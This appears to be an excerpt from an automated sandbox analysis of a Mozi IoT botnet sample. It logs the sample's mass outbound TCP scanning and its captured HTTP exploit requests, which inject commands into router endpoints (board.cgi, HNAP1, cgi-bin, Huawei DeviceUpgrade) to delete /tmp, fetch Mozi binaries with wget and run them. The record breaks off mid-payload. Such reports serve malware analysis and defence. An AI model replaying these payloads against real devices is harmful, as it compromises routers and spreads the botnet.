Source: global traffic TCP traffic: 192.168.2.23:58636 -> 80.55.28.151:5555
Source: global traffic TCP traffic: 192.168.2.23:55046 -> 92.66.154.32:52869
Source: global traffic TCP traffic: 192.168.2.23:58820 -> 209.94.249.210:8080
Source: global traffic TCP traffic: 192.168.2.23:37492 -> 33.139.95.124:8443
Source: global traffic TCP traffic: 192.168.2.23:52162 -> 40.233.243.160:8080
Source: global traffic TCP traffic: 192.168.2.23:58036 -> 12.61.228.207:5555
Source: global traffic TCP traffic: 192.168.2.23:39396 -> 44.68.97.207:8080
Source: global traffic TCP traffic: 192.168.2.23:53872 -> 39.170.132.129:8443
Source: global traffic TCP traffic: 192.168.2.23:46282 -> 183.127.231.20:8080
Source: global traffic TCP traffic: 192.168.2.23:40196 -> 185.130.129.20:5555
Source: global traffic TCP traffic: 192.168.2.23:41488 -> 48.169.95.198:81
Source: global traffic TCP traffic: 192.168.2.23:49772 -> 105.188.53.103:52869
Source: global traffic TCP traffic: 192.168.2.23:39268 -> 205.236.127.249:8080
Source: global traffic TCP traffic: 192.168.2.23:50190 -> 93.51.81.184:52869
Source: global traffic TCP traffic: 192.168.2.23:47630 -> 38.23.18.254:8080
Source: global traffic TCP traffic: 192.168.2.23:55444 -> 17.82.190.143:5555
Source: global traffic TCP traffic: 192.168.2.23:36210 -> 177.39.137.239:5555
Source: global traffic TCP traffic: 192.168.2.23:37228 -> 69.124.104.165:7574
Source: global traffic TCP traffic: 192.168.2.23:34636 -> 197.43.185.122:37215
Source: global traffic TCP traffic: 192.168.2.23:48156 -> 104.212.206.20:81
Source: global traffic TCP traffic: 192.168.2.23:51530 -> 84.244.40.210:81
Source: global traffic TCP traffic: 192.168.2.23:51326 -> 61.99.62.50:8080
Source: global traffic TCP traffic: 192.168.2.23:39534 -> 163.60.233.12:8080
Source: global traffic TCP traffic: 192.168.2.23:41820 -> 169.46.35.113:5555
Source: global traffic TCP traffic: 192.168.2.23:38410 -> 204.237.78.26:81
Source: global traffic TCP traffic: 192.168.2.23:38788 -> 47.177.12.156:8080
Source: global traffic TCP traffic: 192.168.2.23:52008 -> 1.224.209.95:49152
Source: global traffic TCP traffic: 192.168.2.23:45504 -> 90.195.169.147:81
Source: global traffic TCP traffic: 192.168.2.23:47198 -> 53.235.12.8:81
Source: global traffic TCP traffic: 192.168.2.23:49516 -> 166.92.12.100:49152
Source: global traffic TCP traffic: 192.168.2.23:33430 -> 46.233.176.54:81
Source: global traffic TCP traffic: 192.168.2.23:43462 -> 139.235.155.108:52869
Source: global traffic TCP traffic: 192.168.2.23:60168 -> 169.240.44.151:37215
Source: global traffic TCP traffic: 192.168.2.23:44646 -> 51.88.106.9:8443
Source: global traffic TCP traffic: 192.168.2.23:53694 -> 204.100.68.194:8080
Source: global traffic TCP traffic: 192.168.2.23:42456 -> 211.183.25.135:49152
Source: global traffic TCP traffic: 192.168.2.23:46746 -> 142.131.34.237:8080
Source: global traffic TCP traffic: 192.168.2.23:57418 -> 45.160.19.108:81
Source: global traffic TCP traffic: 192.168.2.23:51732 -> 139.214.25.175:81
Source: global traffic TCP traffic: 192.168.2.23:40984 -> 48.22.187.35:8080
Source: global traffic TCP traffic: 192.168.2.23:34712 -> 94.189.103.10:8443
Source: global traffic TCP traffic: 192.168.2.23:40628 -> 134.162.101.169:8080
Source: global traffic TCP traffic: 192.168.2.23:39634 -> 49.203.225.59:8080
Source: global traffic TCP traffic: 192.168.2.23:37086 -> 156.170.6.10:8080
Source: global traffic TCP traffic: 192.168.2.23:40410 -> 142.228.181.74:81
Source: global traffic TCP traffic: 192.168.2.23:46004 -> 67.112.144.22:8080
Source: global traffic TCP traffic: 192.168.2.23:45840 -> 58.144.222.191:8443
Source: global traffic TCP traffic: 192.168.2.23:53836 -> 147.153.184.105:8080
Source: global traffic TCP traffic: 192.168.2.23:56100 -> 35.197.34.30:8080
Source: global traffic TCP traffic: 192.168.2.23:51956 -> 215.221.225.114:7574
Source: global traffic TCP traffic: 192.168.2.23:55920 -> 104.86.216.214:37215
Source: global traffic TCP traffic: 192.168.2.23:48850 -> 90.198.227.113:49152
Source: global traffic TCP traffic: 192.168.2.23:42412 -> 193.141.57.151:8443
Source: global traffic TCP traffic: 192.168.2.23:55318 -> 219.15.211.177:81
Source: global traffic TCP traffic: 192.168.2.23:40746 -> 77.234.2.16:8443
Source: global traffic TCP traffic: 192.168.2.23:51386 -> 119.163.0.210:52869
Source: global traffic TCP traffic: 192.168.2.23:48256 -> 188.141.179.11:8080
Source: global traffic TCP traffic: 192.168.2.23:53804 -> 175.94.72.226:8080
Source: global traffic TCP traffic: 192.168.2.23:59966 -> 27.133.206.197:8443
Source: global traffic TCP traffic: 192.168.2.23:44598 -> 33.102.102.107:8080
Source: global traffic TCP traffic: 192.168.2.23:53226 -> 50.106.240.52:8080
Source: global traffic TCP traffic: 192.168.2.23:47126 -> 154.158.78.54:8080
Source: global traffic TCP traffic: 192.168.2.23:56266 -> 137.242.74.67:52869
Source: global traffic TCP traffic: 192.168.2.23:53380 -> 19.34.231.37:5555
Source: global traffic TCP traffic: 192.168.2.23:38698 -> 128.34.207.209:7574
Source: global traffic TCP traffic: 192.168.2.23:44212 -> 87.133.8.240:8080
Source: global traffic TCP traffic: 192.168.2.23:43418 -> 148.8.99.90:8080
Source: global traffic TCP traffic: 192.168.2.23:33860 -> 77.23.20.10:52869
Source: global traffic TCP traffic: 192.168.2.23:55178 -> 67.56.126.36:37215
Source: global traffic TCP traffic: 192.168.2.23:60350 -> 179.90.18.98:7574
Source: global traffic TCP traffic: 192.168.2.23:41966 -> 133.221.50.0:5555
Source: global traffic TCP traffic: 192.168.2.23:39014 -> 165.213.73.162:37215
Source: global traffic TCP traffic: 192.168.2.23:37708 -> 46.59.35.45:8080
Source: global traffic TCP traffic: 192.168.2.23:38216 -> 59.119.205.68:8080
Source: global traffic TCP traffic: 192.168.2.23:50072 -> 125.85.219.249:8443
Source: global traffic TCP traffic: 192.168.2.23:59566 -> 36.141.47.147:5555
Source: global traffic TCP traffic: 192.168.2.23:60916 -> 122.169.100.235:7574
Source: global traffic TCP traffic: 192.168.2.23:37306 -> 33.38.63.31:52869
Source: global traffic TCP traffic: 192.168.2.23:51626 -> 179.220.108.237:49152
Source: global traffic TCP traffic: 192.168.2.23:58450 -> 30.56.166.237:8080
Source: global traffic TCP traffic: 192.168.2.23:58384 -> 76.187.121.117:5555
Source: global traffic TCP traffic: 192.168.2.23:56638 -> 149.224.12.120:52869
Source: global traffic TCP traffic: 192.168.2.23:36180 -> 38.14.27.183:8080
Source: global traffic TCP traffic: 192.168.2.23:34580 -> 75.129.81.88:8080
Source: global traffic TCP traffic: 192.168.2.23:40420 -> 141.147.122.73:52869
Source: global traffic TCP traffic: 192.168.2.23:53864 -> 124.74.51.149:5555
Source: global traffic TCP traffic: 192.168.2.23:43188 -> 92.73.131.217:8080
Source: global traffic TCP traffic: 192.168.2.23:58044 -> 39.212.16.20:49152
Source: global traffic TCP traffic: 192.168.2.23:53178 -> 170.248.33.117:37215
Source: global traffic TCP traffic: 192.168.2.23:46344 -> 26.191.178.191:81
Source: global traffic TCP traffic: 192.168.2.23:46374 -> 83.120.45.138:49152
Source: global traffic TCP traffic: 192.168.2.23:48128 -> 1.92.53.143:8080
Source: global traffic TCP traffic: 192.168.2.23:50416 -> 188.90.174.120:52869
Source: global traffic TCP traffic: 192.168.2.23:58366 -> 20.236.23.34:8080
Source: global traffic TCP traffic: 192.168.2.23:46916 -> 87.55.175.136:8080
Source: global traffic TCP traffic: 192.168.2.23:48772 -> 51.133.94.169:5555
Source: global traffic TCP traffic: 192.168.2.23:46998 -> 8.236.6.123:81
Source: global traffic TCP traffic: 192.168.2.23:51178 -> 98.210.110.203:8080
Source: global traffic TCP traffic: 192.168.2.23:36010 -> 87.24.204.138:5555
Source: global traffic TCP traffic: 192.168.2.23:48112 -> 77.65.129.42:8080
Source: global traffic TCP traffic: 192.168.2.23:32954 -> 218.120.200.65:81
Source: global traffic TCP traffic: 192.168.2.23:48750 -> 9.112.187.214:8080
Source: global traffic TCP traffic: 192.168.2.23:41978 -> 196.243.30.187:7574
Source: global traffic TCP traffic: 192.168.2.23:45936 -> 115.204.99.250:8080
Source: global traffic TCP traffic: 192.168.2.23:34236 -> 216.95.248.119:8080
Source: global traffic TCP traffic: 192.168.2.23:57262 -> 115.128.48.99:52869
Source: global traffic TCP traffic: 192.168.2.23:38952 -> 38.8.0.209:5555
Source: global traffic TCP traffic: 192.168.2.23:60762 -> 186.112.97.51:8080
Source: global traffic TCP traffic: 192.168.2.23:39442 -> 139.98.240.226:8443
Source: global traffic TCP traffic: 192.168.2.23:44376 -> 78.43.121.154:7574
Source: global traffic TCP traffic: 192.168.2.23:46492 -> 29.5.24.149:8080
Source: global traffic TCP traffic: 192.168.2.23:49832 -> 120.184.29.196:52869
Source: global traffic TCP traffic: 192.168.2.23:43260 -> 79.115.136.43:49152
Source: global traffic TCP traffic: 192.168.2.23:35434 -> 154.227.186.158:37215
Source: global traffic TCP traffic: 192.168.2.23:41564 -> 210.162.131.189:37215
Source: global traffic TCP traffic: 192.168.2.23:52764 -> 158.128.123.165:5555
Source: global traffic TCP traffic: 192.168.2.23:38600 -> 148.94.12.246:81
Source: global traffic TCP traffic: 192.168.2.23:46986 -> 85.37.127.109:8443
Source: global traffic TCP traffic: 192.168.2.23:41192 -> 102.181.38.0:7574
Source: global traffic TCP traffic: 192.168.2.23:41106 -> 163.186.204.190:5555
Source: global traffic TCP traffic: 192.168.2.23:35780 -> 29.146.1.94:49152
Source: global traffic TCP traffic: 192.168.2.23:57048 -> 17.11.119.17:8080
Source: global traffic TCP traffic: 192.168.2.23:42946 -> 38.236.153.237:8443
Source: global traffic TCP traffic: 192.168.2.23:43738 -> 65.39.159.210:81
Source: global traffic TCP traffic: 192.168.2.23:51958 -> 5.30.108.246:52869
Source: global traffic TCP traffic: 192.168.2.23:47298 -> 190.30.220.5:81
Source: global traffic TCP traffic: 192.168.2.23:49340 -> 144.160.155.179:5555
Source: global traffic TCP traffic: 192.168.2.23:58056 -> 156.225.166.184:37215
Source: global traffic TCP traffic: 192.168.2.23:54508 -> 201.27.197.75:37215
Source: global traffic TCP traffic: 192.168.2.23:52000 -> 54.1.124.25:37215
Source: global traffic TCP traffic: 192.168.2.23:50138 -> 64.226.73.229:8080
Source: global traffic TCP traffic: 192.168.2.23:54484 -> 193.40.3.49:8080
Source: global traffic TCP traffic: 192.168.2.23:38206 -> 34.159.133.139:8080
Source: global traffic TCP traffic: 192.168.2.23:33524 -> 128.182.134.209:81
Source: global traffic TCP traffic: 192.168.2.23:53726 -> 41.1.30.61:37215
Source: global traffic TCP traffic: 192.168.2.23:52966 -> 154.192.176.198:52869
Source: global traffic TCP traffic: 192.168.2.23:53448 -> 128.218.150.32:52869
Source: global traffic TCP traffic: 192.168.2.23:54898 -> 177.209.226.139:8443
Source: global traffic TCP traffic: 192.168.2.23:35840 -> 211.220.38.99:8080
Source: global traffic TCP traffic: 192.168.2.23:36060 -> 41.110.5.76:8080
Source: global traffic TCP traffic: 192.168.2.23:47258 -> 46.254.241.45:37215
Source: global traffic TCP traffic: 192.168.2.23:44852 -> 186.13.189.220:37215
Source: global traffic TCP traffic: 192.168.2.23:57598 -> 43.171.34.211:8080
Source: global traffic TCP traffic: 192.168.2.23:52292 -> 147.217.48.114:81
Source: global traffic TCP traffic: 192.168.2.23:57142 -> 168.21.138.88:37215
Source: global traffic TCP traffic: 192.168.2.23:47872 -> 147.104.119.10:8080
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 117.85.193.250:1023
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 162.201.103.19:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 141.93.255.75:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 196.93.19.115:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 155.244.216.255:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 93.126.167.188:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 102.12.129.238:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 9.162.126.235:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 222.107.223.52:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 118.160.36.76:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 210.150.13.121:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 72.105.117.1:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 132.254.193.87:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 125.178.34.206:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 178.144.58.66:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 179.40.119.240:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 208.146.95.90:1023
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 61.188.82.153:1023
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 46.233.10.3:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 62.91.253.57:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 190.140.82.201:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 107.162.234.59:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 160.96.199.194:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 67.148.132.72:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 180.67.121.81:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 165.3.134.117:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 91.212.102.101:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 71.241.250.217:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 186.67.255.20:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 116.169.136.8:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 180.40.185.213:1023
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 104.14.17.218:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 122.250.86.162:2323
Source: global traffic TCP traffic: 192.168.2.23:17816 -> 152.246.68.40:2323
Source: global traffic TCP traffic: 192.168.2.23:56130 -> 180.219.26.95:8080
Source: global traffic TCP traffic: 192.168.2.23:55378 -> 33.47.108.193:5555
Source: global traffic TCP traffic: 192.168.2.23:38972 -> 11.157.135.243:81
Sample listens on a socket
Source: /tmp/Mozi.m.3 (PID: 5234) Socket: 0.0.0.0::41039 Jump to behavior
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.108.37.251:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.1.122.127:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.57.42.173:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 